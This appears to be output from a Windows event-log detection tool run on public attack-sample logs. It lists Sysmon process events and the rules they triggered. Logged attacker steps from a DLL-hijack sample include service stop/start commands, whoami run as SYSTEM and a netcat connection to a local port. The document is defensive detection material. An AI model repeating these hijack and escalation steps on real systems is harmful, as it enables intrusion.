7 Update Session Orchestrator Dll Hijack.evtx +2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc stop CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc query CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net start CDPSvc : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,informational,Process 
Creation,Command: C:\Windows\system32\net1 start CDPSvc : Path: C:\Windows\System32\net1.exe : User: MSEDGEWIN10\IEUser : Parent Command: net start CDPSvc,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 
+2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx +2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx +2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe : Path: 
C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \??\C:\Windows\system32\autochk.exe * : Path: C:\Windows\System32\autochk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000cc 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000d8 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT 
AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""dwm.exe"" : Path: C:\Windows\System32\dwm.exe : User: Window Manager\DWM-1 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : 
Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0 : Path: C:\Windows\System32\upfc.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dxgiadaptercache.exe : Path: C:\Windows\System32\dxgiadaptercache.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.473 
+09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\NETWORK SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx +2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: 
